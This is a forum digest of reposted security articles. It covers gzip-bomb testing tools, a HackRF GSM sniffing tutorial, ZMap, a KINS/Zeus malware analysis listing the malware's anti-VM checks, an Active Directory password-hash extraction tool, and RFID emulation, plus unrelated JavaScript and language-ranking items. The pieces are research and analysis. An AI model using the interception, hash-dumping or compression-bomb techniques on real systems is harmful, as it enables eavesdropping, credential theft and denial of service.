Cyberis has released a testing framework, both for generic HTTP response tampering and various sizes of gzip bombs. GzipBloat (https://www.github.com/cyberisltd/GzipBloat) is a PHP script to deliver pre-compressed gzipped content to a browser, specifying the correct HTTP response headers for the number of encoding rounds used, and optionally a 'Content-Disposition' header. A more generic response tampering framework - ResponseCoder (https://www.github.com/cyberisltd/ResponseCoder) - allows more fine-grained control, although content is currently compressed on the fly - limiting its effectiveness when used to deliver HTTP compression bombs. Both tools are designed to assist you in testing both intermediary devices (content inspection/next-generation firewalls etc.) and browsers for compression bomb vulnerabilities.

During our tests, we delivered compressed content in a variety of different forms, both as 'file downloads' and as in-line 'HTML content'. The exact tests we conducted and the results can be read in our more detailed paper on this topic here.

Is my Browser Vulnerable?
It is actually easier to name the browser that is not vulnerable - namely Opera - all other major desktop browsers (Internet Explorer, Firefox, Chrome, Safari) available today exhibited at least one denial-of-service condition during our tests. The most serious condition observed was an effective denial-of-service against Windows operating systems when a large gzip-encoded file is returned with a 'Content-Disposition' header - no user interaction was required to exploit the vulnerability, and recovery from the condition required knowledge of the Temporary Internet Files directory structure and command line access. This seemed to affect all recent versions of IE, including IE11 on Windows 8.1 Preview.

Our results demonstrated that the most popular web browsers in use today are vulnerable to various denial-of-service conditions - namely memory, CPU and free disk space consumption - by failing to consider the high compression ratios possible from data with an entropy rate of zero. Depending on the HTTP response headers used, vulnerable browsers will either decompress the content in memory, or directly to disk - only terminating when operating system resources are exhausted.

Conclusion

With the growth of mobile data connectivity, improvements in data compression for Internet communications have become highly desirable from a performance perspective, but extensions to these techniques outside of the original protocol specifications can have unconsidered security impacts. Although compression bombs have been a known threat for a number of years, the growing ubiquity of advanced content inspection devices, and the proliferation of User-Agents which handle compression mechanisms differently, have substantially changed the landscape for these types of attack. The attacks discussed here will provide an effective denial-of-service against a number of popular client browsers, but the impact in these cases is rather limited.
Ultimately, the greater impact of this style of attack is likely to be felt by intermediate content inspection devices with a large pool of users. It is possible a number of advanced content inspection devices may be susceptible to these decompression denial-of-service attacks themselves, potentially as the result of a single server-client response. In an environment with high availability requirements and a large pool of users, a denial-of-service attack which could be launched by a single malicious Internet server could have a devastating impact. Posted by Cyberis at 07:36 Sursa: Cyberis Blog: Vulnerabilities that just won't die - Compression Bombs
  7. [h=3]Sniffing GSM with HackRF[/h]
by admin » Wed Aug 14, 2013 1:29 am

I will open by saying only sniff your own system or a system you have been given permission to work on; sniffing a public network in your country may be illegal.

I recently had a play with sniffing some GSM using the HackRF. The clock was a little unstable and drifted quite a bit, but in the end I was able to view lots of different system messages etc. I will assume you have a working Linux system with GNU Radio and HackRF running for this tutorial. If not, you can use the live CD which I referenced in the software section of the forum - it's a great tool and the HackRF works right out of the box.

First thing to do is find the frequency of a local GSM tower. For this I used gqrx, which is pre-loaded on the live CD. Open it up and have a look around the 900MHz band and you should see something like the image below.

gqrx.png

You can see the non-hopping channel at 952MHz and another at 944.2MHz - write down the approximate frequency for the later step.

Now we need to install Airprobe using the following commands:

git clone git://git.gnumonks.org/airprobe.git
cd airprobe/gsmdecode
./bootstrap
./configure
make
cd ../gsm-receiver
./bootstrap
./configure
make

That's all there is to it - we can now start receiving some GSM. First things first, start Wireshark with the following command:

sudo wireshark

Select "lo" as the capture device and enter gsmtap in the filter window like in the image below:

wireshark.png

Now go back to your terminal window and enter the following:

cd airprobe/gsm-receiver/src/python
./gsm_receive_rtl.py -s 2e6

A window will pop up; the first thing to do is uncheck auto gain and set the slider to full, then enter the GSM frequency you noted before as the center frequency.
Also select peak hold and average in the top window's trace options like so:

spectrum.png

You will see that only the signal on the right (blue line) consistently stays in place over the peak hold (green line), indicating that it is the non-hopping channel. All we need to do to start decoding is, in the top window, click on the center of that frequency hump. You may see some errors coming up, but that is ok - eventually it will start to capture data, something like this:

data.png

You can now see the GSM data popping up in Wireshark. As I said at the beginning, the HackRF clock does drift, so you will need to keep clicking to re-center the correct frequency, but all in all it works pretty well. As silly as it may sound, wrapping your HackRF in a towel or similar really helps the thermal stability of the clock and reduces drift.

Now this "hack" is obviously not very useful on its own, but I think at least it helps to show the massive amount of potential there is in the HackRF.

Sursa: BinaryRF.com • View topic - Sniffing GSM with HackRF
  8. Scanning the Internet in 45 Minutes

by Dennis Fisher

The Internet is a big thing. Or, more accurately, a big collection of things. Figuring out exactly how many things, and what vulnerabilities those things contain, has always been a challenge for researchers, but a new tool released by a group from the University of Michigan is capable of scanning the entire IPv4 address space in less than an hour.

There have been a handful of Internet-wide scans done by various organizations over the years, but most of them have not had a security motivation. And they can take days or weeks, depending upon how the scan is done and what the researchers were trying to accomplish. But the new ZMap tool built by the Michigan researchers has the ability to perform an Internet-wide scan in about 45 minutes while running on an ordinary server. The tool, which the team presented at the USENIX Security conference last week, is open source and freely available for other researchers to use.

To demonstrate the capabilities of ZMap, the Michigan team, which comprises J. Alex Halderman, an assistant professor, and Eric Wustrow and Zakir Durumeric, both doctoral candidates, ran a scan of the entire IPv4 address space, returning results from more than 34 million hosts, or what they estimate to be about 98 percent of the machines in that space.

ZMap is designed specifically to bypass some of the speed obstacles that have slowed down previous large-scale scans of the Internet. The researchers removed some of the considerations for machines on the other end of the scan, for example assuming that they sit on well-provisioned networks and can handle fast probes. The result is that the tool can scan more than 1,300 times faster than the venerable Nmap scanner.
“While Nmap adapts its transmission rate to avoid saturating the source or target networks, we assume that the source network is well provisioned (unable to be saturated by the source host), and that the targets are randomly ordered and widely dispersed (so no distant network or path is likely to be saturated by the scan). Consequently, we attempt to send probes as quickly as the source’s NIC can support, skipping the TCP/IP stack and generating Ethernet frames directly. We show that ZMap can send probes at gigabit line speed from commodity hardware and entirely in user space,” the researchers say in their paper, “ZMap: Fast Internet-Wide Scanning and Its Security Implications”. “While Nmap maintains state for each connection to track which hosts have been scanned and to handle timeouts and retransmissions, ZMap forgoes any per-connection state. Since it is intended to target random samples of the address space, ZMap can avoid storing the addresses it has already scanned or needs to scan and instead selects addresses according to a random permutation generated by a cyclic multiplicative group.”

That stateless scanning, the researchers said, allowed ZMap to get both faster response times and better coverage of the target address space.

As for practical applications of the tool, the researchers already have found several. In the last year, the team ran 110 separate scans of the entire HTTPS infrastructure, finding a total of 42 million certificates. Interestingly, they only found 6.9 million certificates that were trusted by browsers. They also found two separate sets of mis-issued SSL certificates, something that’s been a serious problem in recent years.

The ZMap team also wrote a custom probe to look for the UPnP vulnerability that HD Moore of Rapid7 discovered in January. After scanning 15.7 million devices, they found that 3.3 million were still vulnerable. That bug can be exploited with a single packet.
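The "random permutation generated by a cyclic multiplicative group" quoted above is simple to sketch. This toy Python version uses a small prime for clarity; ZMap itself works with a prime just larger than 2^32 so every IPv4 address maps into the group, skipping group elements that fall outside the address space:

```python
def multiplicative_walk(p, g, start=1):
    """Visit every element of the multiplicative group mod p exactly once,
    assuming g is a primitive root mod p. Only O(1) state is kept, which is
    what lets a scanner cover the whole space without a 'seen' table."""
    x = start
    while True:
        yield x
        x = (x * g) % p
        if x == start:      # the cycle closed: every element was visited
            return

# Toy demo: p = 11, g = 2 (2 is a primitive root mod 11), so the walk
# emits each of 1..10 exactly once, in a shuffled order.
order = list(multiplicative_walk(11, 2))
print(order)  # -> [1, 2, 4, 8, 5, 10, 9, 7, 3, 6]
```

Because the next address is derived purely from the current one, the scanner never stores which hosts it has probed, which is exactly the per-connection state Nmap keeps and ZMap forgoes.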
“Given that these vulnerable devices can be infected with a single UDP packet [25], we note that these 3.4 million devices could have been infected in approximately the same length of time—much faster than network operators can reasonably respond or for patches to be applied to vulnerable hosts. Leveraging methodology similar to ZMap, it would only have taken a matter of hours from the time of disclosure to infect every publicly available vulnerable host,” the researchers say in the paper. Sursa: Scanning the Internet in 45 Minutes | Threatpost
  9. [h=1]Java tops C as most popular language in developer index[/h] [h=2]As Tiobe factors in more sites in its assessment, Java rises, while C and Objective-C drop in the rankings[/h] By Paul Krill | InfoWorld Java has retaken the lead in this month's Tiobe index of the most popular programming languages, which now assesses more search engines to calculate the numbers. The C language barely slipped to the second spot in the August rendition of the Tiobe Programming Community index. Java last held the lead in March. "C and Objective-C are the biggest victims of adding the 16 new search engines," with Objective-C dropping from third place last month to fourth place, Tiobe said. Winners are the Google Go language, which rose to the 26th ranking after being ranked 42nd; LabView, rising from 100 to 49; and Openedge ABL, moving from 129th to 57th. Tiobe gauges language popularity by assessing searches about languages made on popular sites like Google, Yahoo, Baidu, and Wikipedia. Specifically, Tiobe counts skilled engineers, courses, and third-party vendors pertinent to a language. Most of the new indexes are from the United States and China, with Japanese and Brazilian sites also added to the mix. Reddit and MyWeb are among the new sites being gauged. Still, the new sites count for only a small portion when calculating the ratings. "Yes, we added more search engines to improve the validity of the index," Tiobe Managing Director Paul Jansen said. "Another related reason is to make sure that there are less fluctuations in rankings." Tiobe's rankings have had their critics, including Andi Gutmans, CEO of PHP tools vendor Zend Technologies. And consistency among these indexes is now in question. Last month, Tiobe and the rival Pypl Popularity of Programming Language index both had decidedly different takes on the PHP language, with Tiobe saying it was making a comeback while Pypl said it was declining. 
For the month of August, Java turned up in 15.978 percent of Tiobe's searches, barely ahead of C, at 15.974 percent. Rounding out the top five were C++ (9.371 percent), Objective-C (8.082 percent), and PHP (6.694 percent). Pypl, which assesses just the volume of language tutorials searched in Google, also had Java on top (a 27.2 percent share of the index). It was followed by PHP (14.3 percent), C# (9.8 percent), Python (also 9.8 percent), and C++ (9.1 percent). This story, "Java tops C as most popular language in developer index," was originally published at InfoWorld.com. Sursa: Java tops C as most popular language in developer index | Java programming - InfoWorld
  10. KINS malware: initialization and DNA paternity test

A new post about KINS. I don't have anything interesting on my hands right now, so I decided to go on with the analysis of it. This was my first idea, but someone (thanks Michael) suggested something to add to the analysis. The idea comes from a simple question: is KINS a new myth or is it just born from the leaked Zeus source code? Well, I'll start looking at KINS with an eye on Zeus, trying to understand if there are similarities or not. Holidays are coming and I don't have a lot of free time for a complete analysis of the entire malware; right now you'll have to be satisfied with just the groundwork on KINS and Zeus_leaked_source_code, the initialization part only. It's generally an annoying job, but from the groundwork you can understand a lot about the malware. Anyway, I'll try to write something light and readable.

Reference KINS malware: md5 = 7b5ac02e80029ac05f04fa5881a911b2
Reference Zeus leaked source code: version 2.0.8.9

Encrypted strings

Strings are always a good starting point, and as in almost all the malware out there, every suspicious string has been encrypted; most of the time a simple xor encryption suffices. KINS doesn't decrypt all the strings at once; it decrypts a single string when it has to use it. Inside the .text section there's an array of _STRINGINFO structures; each structure contains the necessary data about a single encrypted string:

00000000 _STRINGINFO struc ; (sizeof=0x8)
00000000 key            db ?   ; xor key used to decrypt the encoded string
00000001                db ?   ; undefined; unused because the xor key is 1 byte only
00000002 size           dw ?   ; size of the string to decrypt
00000004 encodedString  dd ?
                               ; string to decrypt
00000008 _STRINGINFO ends

When the malware needs a string it calls DecryptStringW, passing an index to it; the index is the array index:

4231CA DecryptStringW proc near
4231CA     movzx   eax, ax                  ; Id of the string to decrypt
4231CD     lea     eax, STRINGINFO[eax*8]   ; current _STRINGINFO identified by the index
4231D4     xor     ecx, ecx
4231D6     xor     edx, edx                 ; iterator index
4231D8     cmp     cx, [eax+_STRINGINFO.size]
4231DC     jnb     short loc_423209
4231DE     push    ebx
4231DF     push    edi
4231E0 DecryptStringIterator:
4231E0     mov     edi, [eax+_STRINGINFO.encodedString]
4231E3     movzx   ebx, [eax+_STRINGINFO.key]
4231E6     movzx   ecx, dx
4231E9     movsx   di, byte ptr [edi+ecx]
4231EE     xor     di, bx                   ; xor with key
4231F1     xor     di, dx                   ; xor with iterator index
4231F4     mov     ebx, 0FFh
4231F9     and     di, bx                   ; the result is a unicode string
4231FC     inc     edx                      ; increase iterator index
4231FD     mov     [esi+ecx*2], di          ; decrypt byte by byte
423201     cmp     dx, [eax+2]
423205     jb      short DecryptStringIterator
423207     pop     edi
423208     pop     ebx
423209 loc_423209:
423209     movzx   eax, [eax+_STRINGINFO.size]
42320D     xor     ecx, ecx
42320F     mov     [esi+eax*2], cx          ; put NULL at the end of the string
423213     retn
423213 DecryptStringW endp

A double xor operation over every byte of the encrypted string. KINS uses the same structure (_STRINGINFO) and the same decryption method (DecryptStringW) used by Zeus_leaked_source_code. It's a perfect copy&paste approach. There are a lot of strings declared inside the exe, so a comparison of the decrypted strings is necessary.
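The routine boils down to out[i] = (enc[i] XOR key XOR i) & 0xFF, widened to a UTF-16 code unit. A quick Python re-implementation for reference; the key 0x5A and the sample string are made up for the round-trip demo, not values taken from the sample:

```python
def decrypt_string(encoded: bytes, key: int) -> str:
    """Mirror of DecryptStringW: XOR each byte with the one-byte key and
    with its own index, mask to 8 bits, widen to a wide character."""
    return "".join(chr((b ^ key ^ i) & 0xFF) for i, b in enumerate(encoded))

# XOR is its own inverse, so encryption is the same operation in reverse.
plain = "explorer.exe"      # hypothetical plaintext
key = 0x5A                  # hypothetical per-string key
enc = bytes((ord(c) ^ key ^ i) & 0xFF for i, c in enumerate(plain))
print(decrypt_string(enc, key))  # -> explorer.exe
```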
To decrypt all the strings inside KINS you can use this simple IDC function script:

static ListStrings(address){
    auto iString;
    auto sInfo;
    auto xorKey;
    auto sLen;
    auto crypted;
    auto i;
    Message("\nDecrypted string list:\n");
    iString = 0;
    while((address + iString) < 0x4026C8)
    {
        sInfo = address + iString;
        xorKey = Byte(sInfo);
        if (xorKey != 0)
        {
            sLen = Word(sInfo+2);
            crypted = Dword(sInfo+4);
            if (!((crypted < MinEA()) || (crypted > MaxEA())))
            {
                Message("\"");
                for(i=0;i<sLen;i++)
                    Message("%c", Byte(crypted+i) ^ xorKey ^ i);
                Message("\"\n");
                iString = iString + 7; // sizeof(_STRINGINFO) - 1
            }
        }
        iString++;
    }
}

The resulting list contains a lot of interesting strings, but comparing this list with the original one provided by Zeus you'll notice a lot of equal strings. I have to admit that there are some new entries, but the core remains the same.

Init

KINS initialization resides inside a snippet of code starting @407A25 and ending @407C73. It performs all the tasks needed for a clean execution. Looking inside the code you'll notice that the Init procedure is referenced from two different places, one at the beginning of the malware and the other one during its execution. Besides, Init has a lot of calls inside, but not all are executed the first time. That's because KINS has two levels of initialization; it has to set some things now and some later. The first level is performed at the very beginning of the code and the second level is executed when a particular operation has to be done. I'll tell you something more about this second level in the next blog post. E.g.: the process injection feature requires the execution of parts of the Init procedure that are not scheduled in the first execution of Init. I think KINS doesn't want to spoil a lot in the first part of its code, and prefers to follow an exact time scheme. I said KINS but I should say Zeus, because this particular code structure is the same used by Zeus.
Moreover, there's another piece of code taken by copy&paste: to decide what to set up the first time and what later, Init checks the dword value passed as a parameter; I call it "flags". flags is checked inside some if statements; here is a practical example:

.text:00407A31     mov     eax, [ebp+flags]    // INITF_NORMAL_START the first time, (INITF_INJECT_START | INITF_HOOKS_FOR_USER) the next one
...
.text:00407A36     mov     esi, eax
.text:00407A38     and     esi, 1              // Check for INITF_INJECT_START flag bit
.text:00407A3B     mov     [esp+420h+flags_Core], esi
.text:00407A3F     jnz     short loc_407A4B
.text:00407A41     xor     ebx, ebx            // First time
.text:00407A43     mov     processFlags, ebx
.text:00407A49     jmp     short loc_407A4D
.text:00407A4B     xor     ebx, ebx            // Second time
.text:00407A4D     call    InitLoadModules

flags represents the value passed to Init; the first time its value is 0 (INITF_NORMAL_START) and the second time it's 3 (INITF_INJECT_START | INITF_HOOKS_FOR_USER). I have only just started the analysis, but the copy&paste method has already been used a lot of times. For a better explanation I can announce that KINS is heavily based on Zeus_leaked_source_code. Some parts are really equal, some parts have minor changes only, some of them have interesting additions, and some of them are from Zeus versions above 2.0.8.9. Yes, the KINS writers took something from more than one Zeus version.

Copy&paste

As far as I've seen, the core of the malware is equal to Zeus's core. It's based on the same structures, variables and code design. Here is a list of things that are directly taken from Zeus.

- Global variables

Global variables are one of the first things I tried to understand, and I have to say that most of them are simple flags used to recognize a particular status or event.
You can recognize them in the code by looking at mov instructions:

407C34     mov     ref_count, ebx
407C3A     mov     reportFile, ax
407C40     mov     registryKey, ax
407C46     mov     readWriteMutex_localconfig, ax
407C4C     mov     registryKey_localconfig, ax
407C52     mov     readWriteMutex_localsetting, ax
407C58     mov     registryKey_localsetting, ax

- Memory initialization

The malware will need dynamically allocated memory; you can find the memory initialization code starting from @407A5D. This time you can see a mix of flag/variable init:

407A5D     push    ebx
407A5E     push    80000h
407A63     push    ebx
407A64     call    ds:HeapCreate
407A6A     mov     mainHeap, eax
407A6F     cmp     eax, ebx
407A71     jnz     short HeapCreate_OK
407A73     call    ds:GetProcessHeap
407A79     mov     hHeap, eax
407A7E     mov     heapCreated, bl         ; heapCreated = false;
407A84     jmp     short loc_407A8D
407A86 HeapCreate_OK:
407A86     mov     heapCreated, 1          ; heapCreated = true;

mainHeap is a global variable and heapCreated is just a flag recording the success or failure of the heap creation process.

- Crypt initialization

Crypto is used by KINS and, like all the other functionalities, it requires a small place inside Init:

407A9A     mov     _last_rand_tickcount, ebx   ; _last_rand_tickcount = 0;
407AA0     mov     crc32Intialized, bl         ; crc32Initialized = false;

From only two lines of code it's hard to predict their meaning, but, again, a flag and a variable are used. If you want to understand more about them you can try the IDA xref option. After some more investigation you can understand their real use: _last_rand_tickcount is used in a comparison between a value obtained from GetTickCount and the previous tick count value. crc32Initialized is true if crc32 has been initialized, false otherwise.

- Winsock initialization

Another expected feature of the malicious program is the ability to communicate with the server. A malware should send something to the server, and to start this communication process it needs a call to a function like WSAStartup.
The winsock part is all inside a single call instruction to WSAStartup. KINS and Zeus initiate the client-server communication in the same classical way.

- initHandles, initUserData, initPaths

The names of the 3 procedures above are taken from Zeus_leaked_source_code, and I put them together because they initialize global variables only. The procedures are not so interesting per se. To sum up, I can say that KINS creates a manual-reset event, gets the security information of a logon access (it saves two values: the length of the logon security identifier (SID) and an Id which is calculated by crc32(SID)), and gets the full path of the KINS executable.

- initOsBasic

The last fully copy&pasted code contains OS-based tasks. It starts by determining whether KINS is running under WOW64 or not. The status is saved inside a boolean flag, and after that it tries to add a new full-access security descriptor. Once again it saves the result of the operation; it's not a flag variable but a structure with information about the security descriptor. An empty structure means an error during the task. If everything goes fine, KINS produces a 16-byte identifier based on the volume GUID path:

41D9C0     push    64h                     ; cchBufferLength
41D9C2     lea     eax, [ebp+74h+szVolumeName]
41D9C5     push    eax                     ; lpszVolumeName
41D9C6     lea     eax, [ebp+74h+szVolumeMountPoint]
41D9CC     push    eax                     ; lpszVolumeMountPoint
41D9CD     call    edi                     ; GetVolumeNameForVolumeMountPointW
41D9CF     test    eax, eax                ; check the result
41D9D1     jz      short GetVolumeNameForVolumeMountPointW_FAILS
41D9D3     cmp     [ebp+74h+sz], '{'       ; a minor check over the obtained string
41D9D8     jnz     short ERROR
41D9DA     push    [ebp+74h+pclsid]        ; pclsid
41D9DD     xor     eax, eax
41D9DF     mov     [ebp+74h+var_68], ax    ; str[38] = 0;
41D9E3     lea     eax, [ebp+74h+sz]
41D9E6     push    eax                     ; lpsz
41D9E7     call    ds:CLSIDFromString      ; obtains:

GetVolumeNameForVolumeMountPoint could fail; just in case, the snippet above can be executed more than one time.
The first lpszVolumeMountPoint value is obtained by calling SHGetFolderPath. In case GetVolumeNameForVolumeMountPoint fails, the new lpszVolumeMountPoint string is obtained by cutting off its last part (it uses PathRemoveFileSpec). I.e.: it tries "C:\WINDOWS\" and then "C:\" only.

From the organization of the code and the large variety of flags/variables used, it seems like there's a big focus on the details. If something goes wrong, or if KINS thinks that it doesn't have the right conditions to run, it stops running. I.e.: KINS uses a variable to store a value obtained from the combination of the OS version and the integrity level. If the value is outside a range of specific acceptable values, the malware stops. That's why Zeus was, from some points of view, a masterpiece. Yes, I said Zeus, and you know why.

Copy&paste with minor changes

This happens when the code structure of a procedure is the same as the original version but there are some changes or additions. It's the case of the InitLoadModules function; basically it's a sequence of DecryptString/GetProcAddress calls. The list of function addresses to retrieve is slightly changed from Zeus. The new list is composed of: NtCreateThread, NtCreateUserProcess, NtQueryInformationProcess, NtQueryInformationThread, RtlUserThreadStart, NtMapViewOfSection, NtUnmapViewOfSection, NtSuspendProcess, NtResumeProcess, NtClose and LdrFindEntryForAddress. I don't know if it's a KINS addition or if it's taken from a newer Zeus version. I'm not a security expert and I can't access all the possible Zeus versions, but it's a doubt I have: KINS takes some concepts from other Zeus versions (beyond the one I'm referring to, 2.0.8.9).

Copy&paste from a more recent Zeus version

Here's a practical example of my doubt: the anti-check routine! As I said before, KINS runs only under particular conditions, and its continuation depends on the values returned by the 8 calls made here.
Every call performs a specific check:

- CheckForPopupKiller: looks for the file "C:\popupkiller.exe"; if it exists, KINS aborts
- CheckForExecuteExe: another unwanted file on the system is "C:\TOOLS\execute.exe"
- CheckForSbieDll: it's time for a dll check; it tries to load "SbieDll.dll" (a Sandboxie-related dll), which it doesn't want on the system
- CheckMutexFrz_State: the mutex under observation is Frz_State, which is from the Deep Freeze software
- CheckForNPF_NdisWanIp: the network-tool check; KINS doesn't want "\\.\NPF_NdisWanIp" on the system
- CheckForVMWareRelatedFiles: VMware is strictly prohibited: "\\.\HGFS" and "\\.\vmci" are the files to look for
- CheckForVBoxGuest: even VirtualBox is prohibited ("\\.\VBoxGuest")
- CheckForSoftwareWINERegKey: checks for the existence of the key "Software\WINE"

If one of the calls above fails, KINS aborts its execution immediately. There's no trace of this code inside Zeus_leaked_source_code, but I read some articles on the net talking about this specific snippet. You can read something here.

Snippets based on Zeus with KINS-specific features

This is the most interesting part of the malware's Init, the place where something new joins the party! In this part of the code the malware tries to create some Id values, based on machine components and properties (computer name, version information, install date, GUID, physical memory and volume serial number). Zeus does the same, but it uses a simple xor decryption, crc32 and RC4 in its calculations. KINS substitutes everything with its own virtual machine combined with crc32, RC4, the SHA-1 hash algorithm and some brain-blasting calculations. I won't go into details right here, but if you need them drop me a mail and I'll tell you more. Basically, the additions are strictly related to the use of the virtual machine. I gave a description of the virtual machine here, but I didn't talk about its usage inside the malware.
The VM is called several times during the lifetime of the malware, but every time the VM modifies DataBuffer in the same way (meaning the algorithm produced by the VM is always the same). When the VM ends, a number of bytes from DataBuffer are taken for the specific usage; in this initialization process they are used as a key for the RC4 algorithm. Imho, it's quite a strange approach. I don't know why you would call the same algorithm a lot of times, especially when the result is always the same. Maybe it's just a way to confuse the job of the reversers out there, or maybe I'm missing something...

Is KINS a new myth or is it just born from the leaked Zeus source code? Well, I'm not a security expert and I can't say it for sure, but judging from what I've seen so far I think that KINS is strongly based on Zeus_leaked_source_code; they have the same DNA! It's the same concept as in real life: KINS has something completely new, but the core comes from the father, Zeus. Anyway, this is only an introduction to the DNA paternity test. Now I would like to know if we can apply the same concept to all the features of both malwares. Maybe soon; now it's holiday time!

Sursa: KINS malware: initialization and DNA paternity test | My infected computer
  11. JavaScript Object Oriented Programming (OOP) Tutorial

Object Oriented Programming is one of the most popular ways to do programming. Before OOP there was only a list of instructions executed one by one, but in OOP we deal with objects and how those objects interact with one another. JavaScript supports Object Oriented Programming, but not in the same way as other OOP languages (C++, PHP, Java, etc.). The main difference between these languages and JavaScript is that there are no classes in JavaScript, and classes are very important for creating objects. But there is a way we can simulate the class concept in JavaScript. Another important difference is data hiding. There are no access specifiers (public, private, protected) in JavaScript. Again, we will simulate the concept using variable scope in functions.

Object Oriented Programming Concepts
1)Object
2)Class
3)Constructor
4)Inheritance
5)Encapsulation
6)Abstraction
7)Polymorphism

Preparing the work space

Create a new file "oops.html" and write this code in it. We will write all our JavaScript code in this file.

<html>
<head>
<title>JavaScript Object Oriented Programming(OOPs) Tutorial</title>
</head>
<body>
<script type="text/javascript">
//Write your code here.....
</script>
</body>
</html>

1)Object

Any real-world entity is considered an Object. Every Object will have some properties and functions. For example, consider a person as an object: he will have properties like name, age, etc. and functions such as walk, talk, eat, think, etc. Now let's see how we create objects in JavaScript. There are several ways to create objects in JavaScript. Some of them are:

//1)Creating Object through literal
var obj={};

//2)Creating with Object.create
var obj= Object.create(null);

//3)Creating using new keyword
function Person(){}
var obj=new Person();

We can use any of the above ways to create an Object.

2)Class

As I said earlier, there are no classes in JavaScript, because JavaScript is a prototype-based language.
But we can simulate the class concept using JavaScript functions. function Person(){ //Properties this.name="aravind"; this.age="23"; //functions this.sayHi=function(){ return this.name +" Says Hi"; } } //Creating person instance var p=new Person(); alert(p.sayHi()); 3)Constructor The constructor is a concept that goes hand in hand with the class concept: it is used to assign values to the properties of the class when creating an object with the new operator. In the code above we gave the Person class the name and age properties; now we will assign values to them while creating new Person objects, as below. function Person(name,age){ //Assigning values through constructor this.name=name; this.age=age; //functions this.sayHi=function(){ return this.name +" Says Hi"; } } //Creating person instance var p=new Person("aravind",23); alert(p.sayHi()); //Creating second person instance var p2=new Person("jon",23); alert(p2.sayHi()); 4)Inheritance Inheritance means acquiring the properties and functions of one class in another class. For example, let's consider a "Student" class. A student also has the properties name and age, and we already have these properties in the Person class, so it's much better to inherit them from Person instead of re-creating them. Now let's see how we can do inheritance in JavaScript. function Student(){} //1)Inheritance through Object.create (inherits prototype members only) Student.prototype=Object.create(Person.prototype); //2)Prototype based inheritance (also inherits members set in the constructor) Student.prototype=new Person(); var stobj=new Student(); alert(stobj.sayHi()); We can do inheritance in either of the above two ways; note that the second assignment is the one in effect here, and it is what makes sayHi (set inside the Person constructor) available to Student. 5)Encapsulation Before we learn Encapsulation and Abstraction we first need to know what data hiding is and how we can achieve it in JavaScript. Data hiding means preventing data from being accessed outside its scope. For example, say the Person class has a Date of Birth (dob) property and we want to hide it from the outside. Let's see how we can do it. 
function Person(){ //this is a private variable var dob="8 June 2012"; //public properties and functions return{ age:"23", name:"aravind", getDob:function(){ return dob; } } } var pobj=new Person(); //this will log undefined //because dob is private to Person console.log(pobj.dob); //this will log the dob value, using the //public function to reach the private data console.log(pobj.getDob()); Encapsulation means wrapping up public and private data into a single unit, and the example above illustrates it well. 6)Abstraction Abstraction means hiding the inner implementation details and showing only the outer behaviour. To fully appreciate abstraction it helps to know the abstract class and interface concepts from Java, but there is no direct equivalent of abstract or interface in JS. OK! Now, in order to understand abstraction in JavaScript, let's take an example from the JavaScript library jQuery. In jQuery we use $("#ele") to select an element with id ele on a web page. Under the hood this calls the native JavaScript code document.getElementById("ele"); but we don't need to know that: we can happily use $("#ele") without knowing the inner details of the implementation. 7)Polymorphism The word Polymorphism in OOP means having more than one form. In JavaScript an object, property or method can have more than one form. Polymorphism is a very cool feature for dynamic binding, or late binding. function Person(){ this.sayHI=function(){} }; //This will create Student Class function Student(){}; Student.prototype=new Person(); Student.prototype.sayHI=function(){ return "Hi! I am a Student"; } //This will create Teacher Object function Teacher(){}; Teacher.prototype=new Person(); Teacher.prototype.sayHI=function(){ return "Hi! I am a Teacher"; } var sObj=new Student(); //This will check if the student //object is an instance of Person or not; //if not, it won't execute our alert code. if (sObj instanceof Person) { alert("Hurray! JavaScript supports OOP"); } Conclusion JavaScript supports Object Oriented Programming (OOP) concepts, though maybe not in the direct way: we need to simulate some of the concepts. 10 Aug 2013 by aravind buddha at 10:44 PM Sursa:JavaScript Object Oriented Programming(OOP) Tutorial : Techumber
  12. [h=1]Active Directory Password Hash Extraction[/h] Just added a tool for offline Active Directory password hash extraction. It has very basic functionality right now, but much more is planned. It's a command line application and it runs on Windows only at the moment.
ntds_decode -s <FILE> -d <FILE> -m -i
-s <FILE> : SYSTEM registry hive
-d <FILE> : Active Directory database
-m : Machines (omitted by default)
-i : Inactive, Locked or Disabled accounts (omitted by default)
The SYSTEM registry hive and Active Directory database are taken from a domain controller. These files are obviously locked, so you need to back them up using the Volume Shadow Copy Service. The output format is similar to pwdump. LM and NTLM hashes are extracted from active user accounts only. ntds_decode mounts the SYSTEM file, so Administrator access is required on the computer you run it on. If you're an experienced pen tester or Administrator who would like to test this tool, you can grab it from here. It's advisable not to use the tool unless you know what you're doing. Source isn't provided at the moment because it's too early to release. If you have questions about it, feel free to e-mail the address provided in README.txt Sursa: Active Directory Password Hash Extraction | Insecurety Research
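The post says the output format is similar to pwdump. Assuming the usual pwdump record layout, user:RID:LM:NT::: (an assumption, since ntds_decode's exact output isn't shown), a record can be split like this:

```python
def parse_pwdump_line(line: str) -> dict:
    """Split one pwdump-style record: user:rid:lmhash:nthash:::"""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}

# The two hashes below are the well-known "empty password" LM and NT values,
# handy as a sanity check when eyeballing dumped accounts.
rec = parse_pwdump_line(
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:"
    "31d6cfe0d16ae931b73c59d7e0c089c0:::")
```

An LM field of aad3b435b51404eeaad3b435b51404ee also tells you LM hashing was disabled for that account, which matters before feeding the dump to a cracker.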
  13. RFIDler - A Software Defined RFID Reader/Writer/Emulator RFIDler (RFID Low-frequency Emulater & Reader). An open platform RFID reader/writer/emulator that can operate in the 125-134 KHz range. Software Defined is the buzz-word in RF these days, and we use SDR (Software Defined Radio) in our work as reverse-engineers all the time, with great projects like HackRF and GNU Radio, etc. So when it came to looking at RFID for a recent engagement, we decided to see if we couldn't apply the same thinking to that technology. And guess what? Yes, you can! One of our team, Adam Laurie (aka Code Monkey), has spent many years playing with RFID, and is the author of RFIDIOt, the open-source RFID python software library, so is very familiar with the higher-level challenges associated with these devices. However, a complete understanding of what goes on 'under the hood' is harder to come by, and it was only when he teamed up with Chip Monkey, Zac Franken, who has been hardware hacking and pulling things to bits (and putting them back together so they do something much more fun) since he was big enough to hold a screwdriver, that the full picture started to emerge... The Goal To produce a tool for Low Frequency (125-134Khz) RFID research projects, as well as a cut-down (Lite) version that can be embedded into your own hardware projects. The fully featured version we hope to bring in for around £30.00, and the Lite version for under £20.00. Features We have written extensive firmware which includes a user interface and an API to allow easy use of the system and to allow you to explore, read and emulate a wide range of low frequency RFID tags. 
Utilise ANY modulation scheme, including bi-directional protocols
Write data to tag
Read data from tag
Emulate tag
